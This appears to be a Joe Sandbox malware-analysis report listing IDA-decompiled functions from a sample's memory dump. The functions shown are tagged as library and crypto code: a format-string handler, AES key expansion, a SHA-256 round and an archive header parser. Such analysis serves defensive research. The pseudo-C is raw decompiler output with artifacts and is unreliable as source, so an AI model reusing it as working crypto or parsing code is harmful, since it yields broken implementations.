Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6851e4a016e8d4f39c6a722d805cbd86c58044d76f02840f862fbcbfe0a70cc5
Instruction ID: 0c215554f75cf759d929f5b364b37d264910bcbc96739c5f10d932086c435841
Opcode Fuzzy Hash: 6851e4a016e8d4f39c6a722d805cbd86c58044d76f02840f862fbcbfe0a70cc5
Instruction Fuzzy Hash: BC614471E40F0866DA389B78A9B57FE23A4BB11353F140519FC46DF281E2B1DD8E8711

Uniqueness

Uniqueness Score: -1.00%

Function 00A54F9A Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E00A54F9A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00A55B88(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00A54464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00A55E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00A54464(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00A55D51(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00A54464(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00A55993(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00A55B70(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00A5559F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00A55ADD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00A55B51(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00A554D9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00A5586B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00a54f9f
0x00a54fa2
0x00a54fa6
0x00a54fa9
0x00a54fad
0x00a54fb0
0x00a5501e
0x00a55021
0x00a55070
0x00a55070
0x00a55073
0x00a54fe0
0x00a54fe2
0x00a54fe7
0x00a54fe9
0x00a5508e
0x00a55092
0x00a5509b
0x00a550a0
0x00a550a1
0x00a550a5
0x00a550a7
0x00a550ac
0x00a550af
0x00a550b1
0x00a550da
0x00a550da
0x00a550dd
0x00a550e0
0x00a550e7
0x00a550e9
0x00a550ec
0x00a550ee
0x00a550f2
0x00a550f2
0x00a550f5
0x00a55100
0x00a55100
0x00a55102
0x00a55102
0x00a55104
0x00a5510a
0x00a5510a
0x00a5510f
0x00a55112
0x00a5511d
0x00a5511d
0x00a5511f
0x00a5511f
0x00a5512a
0x00a5512e
0x00a5512e
0x00a55131
0x00a55137
0x00a55139
0x00a5513c
0x00a5514c
0x00a55151
0x00a55151
0x00a55166
0x00a5516b
0x00a5516e
0x00a55173
0x00a55176
0x00a55178
0x00a5517a
0x00a5517d
0x00a55180
0x00a5518d
0x00a55192
0x00a55192
0x00a55180
0x00a55199
0x00a5519e
0x00a551a1
0x00a551a6
0x00a551a9
0x00a551ab
0x00a551b8
0x00a551bd
0x00a551ab
0x00a551c0
0x00a551c3
0x00a551c8
0x00a551c8
0x00a55114
0x00a55117
0x00000000
0x00000000
0x00a55119
0x00000000
0x00a55119
0x00a55106
0x00a55108
0x00000000
0x00000000
0x00000000
0x00a55108
0x00a550f7
0x00a550fa
0x00000000
0x00000000
0x00a550fc
0x00000000
0x00a550fc
0x00a550f0
0x00a550f0
0x00a550f0
0x00000000
0x00a550f0
0x00a550e2
0x00a550e5
0x00000000
0x00000000
0x00000000
0x00a550e5
0x00a550b5
0x00a550b8
0x00a550ba
0x00a550c2
0x00a550c4
0x00a550ce
0x00a550d0
0x00a550d2
0x00000000
0x00000000
0x00a550d4
0x00a550d8
0x00a550d8
0x00000000
0x00a550d8
0x00a550c6
0x00000000
0x00a550c6
0x00a550bc
0x00000000
0x00a550bc
0x00a55094
0x00000000
0x00a55094
0x00a54fef
0x00a54fef
0x00000000
0x00a54fef
0x00a5507a
0x00a5507a
0x00a5507d
0x00a5504f
0x00a5504f
0x00a55050
0x00a55052
0x00a55054
0x00000000
0x00a55054
0x00a5507f
0x00a55082
0x00000000
0x00000000
0x00a55088
0x00a54ff7
0x00a54ff7
0x00000000
0x00a54ff7
0x00a55023
0x00a55066
0x00000000
0x00a55066
0x00a55025
0x00a55028
0x00a5505b
0x00a5505d
0x00000000
0x00a5505d
0x00a5502a
0x00a5502d
0x00a5504b
0x00a5504b
0x00a5504b
0x00a5504b
0x00000000
0x00a5504b
0x00a5502f
0x00a55032
0x00a55044
0x00000000
0x00a55044
0x00a55034
0x00a55037
0x00000000
0x00000000
0x00a5503b
0x00000000
0x00a5503b
0x00a54fb2
0x00000000
0x00000000
0x00a54fb8
0x00a54fbb
0x00a54ffb
0x00a54ffb
0x00a54ffe
0x00a55017
0x00000000
0x00a55017
0x00a55000
0x00a55000
0x00a55003
0x00000000
0x00000000
0x00a55006
0x00a55009
0x00000000
0x00000000
0x00a5500b
0x00a5500e
0x00000000
0x00a5500e
0x00a54fbd
0x00a54ff6
0x00000000
0x00a54ff6
0x00a54fc2
0x00000000
0x00000000
0x00a54fcb
0x00000000
0x00000000
0x00a54fd0
0x00000000
0x00000000
0x00a54fd5
0x00000000
0x00000000
0x00a54fde
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 45463ca3fa789228fdd0e5a91ba8fbd7600494d89cffa4f1be666addf48cba46
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 0D512471E00E446BDB38677C8576BBE27E5BB16707F180919EC82CB282D535AD8D8391

Uniqueness

Uniqueness Score: -1.00%

Function 00A3EFE2 Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00A3EFE2(intOrPtr __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _t94;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed char _t120;
				signed int* _t121;
				signed int* _t122;
				signed int _t123;
				signed int* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				void* _t130;
				signed int _t131;
				void* _t132;
				signed int _t134;
				signed int* _t139;
				signed int* _t142;
				void* _t145;
				void* _t167;

				_t134 = _a4 - 6;
				_v48 = __ecx;
				_v40 = _t134;
				_t94 = E00A50320( &_v32, _a4, 0x20);
				_t145 =  &_v48 + 0xc;
				_t117 = 0;
				_t126 = 0;
				_t127 = 0;
				if(_t134 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t128 = 0xa6e198;
						do {
							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0xa6e098);
							_v32 = _t120;
							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0xa6e098);
							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0xa6e098);
							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0xa6e098);
							_t94 =  *_t128 ^ _t120;
							_v32 = _t94;
							_v36 =  &(_t128[0]);
							if(_t134 == 8) {
								_t121 =  &_v28;
								_v44 = 3;
								do {
									_t130 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t55 =  &_v44;
									 *_t55 = _v44 - 1;
								} while ( *_t55 != 0);
								_t122 =  &_v12;
								_v44 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xa6e098);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xa6e098);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xa6e098);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xa6e098);
								do {
									_t131 = 4;
									do {
										_t94 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t94;
										_t122 =  &(_t122[0]);
										_t131 = _t131 - 1;
									} while (_t131 != 0);
									_t76 =  &_v44;
									 *_t76 = _v44 - 1;
								} while ( *_t76 != 0);
								goto L28;
							} else {
								if(_t134 > 1) {
									_t124 =  &_v28;
									_v44 = _t134 - 1;
									do {
										_t132 = 4;
										do {
											_t94 =  *((intOrPtr*)(_t124 - 4));
											 *_t124 =  *_t124 ^ _t94;
											_t124 =  &(_t124[0]);
											_t132 = _t132 - 1;
										} while (_t132 != 0);
										_t50 =  &_v44;
										 *_t50 = _v44 - 1;
									} while ( *_t50 != 0);
								}
								_t131 = 0;
								if(_t134 <= 0) {
									L37:
									_t167 = _t117 - _a4;
								} else {
									L28:
									while(_t117 <= _a4) {
										if(_t131 < _t134) {
											_t139 =  &(( &_v32)[_t131]);
											while(_t126 < 4) {
												_t123 = _t126 + _t117 * 4;
												_t113 =  *_t139;
												_t131 = _t131 + 1;
												_t139 =  &_a4;
												_t126 = _t126 + 1;
												 *(_v48 + 0x18 + _t123 * 4) = _t113;
												_t134 = _v40;
												if(_t131 < _t134) {
													continue;
												}
												break;
											}
										}
										if(_t126 == 4) {
											_t117 = _t117 + 1;
										}
										_t90 = _t126 - 4; // -4
										_t94 =  ~_t90;
										asm("sbb eax, eax");
										_t126 = _t126 & _t94;
										if(_t131 < _t134) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
								}
							}
							L38:
							_t128 = _v36;
						} while (_t167 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t127 < _t134) {
							_t142 =  &(( &_v32)[_t127]);
							while(_t126 < 4) {
								_t125 = _t126 + _t117 * 4;
								_t116 =  *_t142;
								_t127 = _t127 + 1;
								_t142 =  &_a4;
								_t126 = _t126 + 1;
								 *(_v48 + 0x18 + _t125 * 4) = _t116;
								_t134 = _v40;
								if(_t127 < _t134) {
									continue;
								}
								break;
							}
						}
						if(_t126 == 4) {
							_t117 = _t117 + 1;
						}
						_t18 = _t126 - 4; // -4
						_t94 =  ~_t18;
						asm("sbb eax, eax");
						_t126 = _t126 & _t94;
						if(_t127 < _t134) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t94;
			}

0x00a3eff8
0x00a3effb
0x00a3f000
0x00a3f004
0x00a3f009
0x00a3f00c
0x00a3f00e
0x00a3f010
0x00a3f014
0x00a3f062
0x00a3f065
0x00a3f06b
0x00a3f070
0x00a3f079
0x00a3f07f
0x00a3f08e
0x00a3f09d
0x00a3f0ac
0x00a3f0b2
0x00a3f0b5
0x00a3f0b9
0x00a3f0c0
0x00a3f0f3
0x00a3f0f7
0x00a3f0ff
0x00a3f101
0x00a3f102
0x00a3f105
0x00a3f107
0x00a3f108
0x00a3f108
0x00a3f10d
0x00a3f10d
0x00a3f10d
0x00a3f119
0x00a3f11d
0x00a3f12b
0x00a3f13a
0x00a3f149
0x00a3f158
0x00a3f15c
0x00a3f15e
0x00a3f15f
0x00a3f15f
0x00a3f162
0x00a3f164
0x00a3f165
0x00a3f165
0x00a3f16a
0x00a3f16a
0x00a3f16a
0x00000000
0x00a3f0c2
0x00a3f0c5
0x00a3f0ca
0x00a3f0ce
0x00a3f0d2
0x00a3f0d4
0x00a3f0d5
0x00a3f0d5
0x00a3f0d8
0x00a3f0da
0x00a3f0db
0x00a3f0db
0x00a3f0e0
0x00a3f0e0
0x00a3f0e0
0x00a3f0d2
0x00a3f0e7
0x00a3f0eb
0x00a3f1b9
0x00a3f1b9
0x00a3f0f1
0x00000000
0x00a3f171
0x00a3f178
0x00a3f17e
0x00a3f182
0x00a3f18b
0x00a3f18e
0x00a3f191
0x00a3f192
0x00a3f195
0x00a3f196
0x00a3f19a
0x00a3f1a0
0x00000000
0x00000000
0x00000000
0x00a3f1a0
0x00a3f1a2
0x00a3f1a9
0x00a3f1ab
0x00a3f1ab
0x00a3f1ac
0x00a3f1af
0x00a3f1b1
0x00a3f1b3
0x00a3f1b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3f1b7
0x00a3f171
0x00a3f0eb
0x00a3f1bc
0x00a3f1bc
0x00a3f1bc
0x00a3f070
0x00000000
0x00a3f016
0x00a3f021
0x00a3f027
0x00a3f02b
0x00a3f034
0x00a3f037
0x00a3f03a
0x00a3f03b
0x00a3f03e
0x00a3f03f
0x00a3f043
0x00a3f049
0x00000000
0x00000000
0x00000000
0x00a3f049
0x00a3f04b
0x00a3f052
0x00a3f054
0x00a3f054
0x00a3f055
0x00a3f058
0x00a3f05a
0x00a3f05c
0x00a3f060
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3f060
0x00a3f016
0x00a3f1cd
0x00a3f1cd

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539cb588a6695c34744826de33c0209c3f17995aef2a6a12e7bbba41aeb0311e
Instruction ID: fcd653e2ec6f0f337c52ce1d225d25ce48d26a75c058632c59693d62016d8893
Opcode Fuzzy Hash: 539cb588a6695c34744826de33c0209c3f17995aef2a6a12e7bbba41aeb0311e
Instruction Fuzzy Hash: 3F51E2359093D58FD702CF38D14046EBFF0AE9A314F4A09AEF4D95B243D220DA4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A400B7 Relevance: .1, Instructions: 141
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00A400B7() {
				signed int _t81;
				signed int _t96;
				signed int _t98;
				signed int* _t99;
				unsigned int* _t100;
				void* _t101;
				unsigned int _t103;
				signed int _t108;
				unsigned int _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t149;
				void* _t151;

				_t130 =  *(_t151 + 0x148);
				_t133 = 0;
				_t99 =  &(_t130[0xa]);
				do {
					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E00A568E4( *_t99);
					_t99 =  &(_t99[1]);
					_t133 = _t133 + 1;
				} while (_t133 < 0x10);
				_t100 = _t151 + 0x80;
				_t148 = 0x30;
				do {
					_t103 =  *(_t100 - 0x34);
					_t122 =  *_t100;
					asm("rol esi, 0xe");
					_t100 =  &(_t100[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
					_t148 = _t148 - 1;
				} while (_t148 != 0);
				_t81 =  *_t130;
				_t101 = 0;
				_t108 = _t130[1];
				_t124 = _t130[2];
				_t140 = _t130[5];
				_t149 = _t130[4];
				 *(_t151 + 0x20) = _t81;
				 *(_t151 + 0x2c) = _t81;
				 *(_t151 + 0x28) = _t130[3];
				 *(_t151 + 0x10) = _t130[6];
				_t131 =  *(_t151 + 0x20);
				 *(_t151 + 0x14) = _t108;
				 *(_t151 + 0x18) = _t124;
				 *(_t151 + 0x1c) = _t140;
				 *(_t151 + 0x24) = _t130[7];
				do {
					 *(_t151 + 0x40) =  *(_t151 + 0x10);
					asm("rol eax, 0x7");
					 *(_t151 + 0x3c) = _t140;
					asm("ror esi, 0xb");
					 *(_t151 + 0x30) = _t108;
					 *(_t151 + 0x34) = _t124;
					_t125 =  *(_t151 + 0x1c);
					asm("ror eax, 0x6");
					 *(_t151 + 0x1c) = _t149;
					 *(_t151 + 0x38) = _t149;
					_t40 = _t101 + 0xa63b28; // 0x428a2f98
					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
					_t101 = _t101 + 4;
					_t147 = _t146 +  *(_t151 + 0x24);
					 *(_t151 + 0x24) =  *(_t151 + 0x10);
					_t149 =  *(_t151 + 0x28) + _t147;
					 *(_t151 + 0x10) = _t125;
					asm("rol eax, 0xa");
					asm("ror edx, 0xd");
					 *(_t151 + 0x20) = _t131;
					asm("ror eax, 0x2");
					 *(_t151 + 0x28) =  *(_t151 + 0x18);
					_t96 =  *(_t151 + 0x14);
					_t108 = _t131;
					 *(_t151 + 0x18) = _t96;
					 *(_t151 + 0x14) = _t108;
					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
					_t140 =  *(_t151 + 0x1c);
					_t124 = _t96;
				} while (_t101 < 0x100);
				_t98 =  *(_t151 + 0x2c) + _t131;
				_t132 =  *(_t151 + 0x148);
				_t132[1] = _t132[1] + _t108;
				_t132[2] = _t132[2] +  *(_t151 + 0x30);
				_t132[3] = _t132[3] +  *(_t151 + 0x34);
				_t132[5] = _t132[5] +  *(_t151 + 0x38);
				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
				_t132[4] = _t132[4] + _t149;
				_t132[7] = _t132[7] +  *(_t151 + 0x40);
				 *_t132 = _t98;
				return _t98;
			}

0x00a400c1
0x00a400c8
0x00a400ca
0x00a400cd
0x00a400d4
0x00a400d8
0x00a400db
0x00a400dd
0x00a400e4
0x00a400eb
0x00a400ec
0x00a400ec
0x00a400f1
0x00a400f5
0x00a400f8
0x00a400fb
0x00a40109
0x00a4010c
0x00a4011e
0x00a40121
0x00a40121
0x00a40126
0x00a40128
0x00a4012a
0x00a4012d
0x00a40130
0x00a40133
0x00a40136
0x00a4013a
0x00a40141
0x00a40148
0x00a4014f
0x00a40153
0x00a40157
0x00a4015b
0x00a4015f
0x00a40163
0x00a40167
0x00a4016d
0x00a40170
0x00a40176
0x00a4017b
0x00a4017f
0x00a40185
0x00a4018b
0x00a40198
0x00a4019e
0x00a401ae
0x00a401b4
0x00a401b8
0x00a401bb
0x00a401bf
0x00a401c3
0x00a401c5
0x00a401cb
0x00a401d0
0x00a401d5
0x00a401db
0x00a401f8
0x00a401fc
0x00a40200
0x00a40202
0x00a40206
0x00a4020a
0x00a4020d
0x00a40211
0x00a40213
0x00a40223
0x00a40225
0x00a4022c
0x00a40233
0x00a4023a
0x00a40241
0x00a40248
0x00a4024b
0x00a40252
0x00a40255
0x00a40261

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d328bec97c179e92cd58e2a7bcf2e586c0402b9977f29458d47959ffa6388c
Instruction ID: dfa6d4c1014695a2c332d4fb8769275631e7fbcec0ae4769483f948130330622
Opcode Fuzzy Hash: 91d328bec97c179e92cd58e2a7bcf2e586c0402b9977f29458d47959ffa6388c
Instruction Fuzzy Hash: 7851DEB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734EA59CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00A43E0B Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A43E0B(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00A44E52(__ecx) != 0) {
					E00A3A881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00A3A898(_t88) >> 8;
					E00A3A881(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L12;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00A3A898(_t88) >> 8;
					E00A3A881(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L8:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L12;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00A3A898(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L8;
				} else {
					L12:
					return 0;
				}
			}

0x00a43e11
0x00a43e15
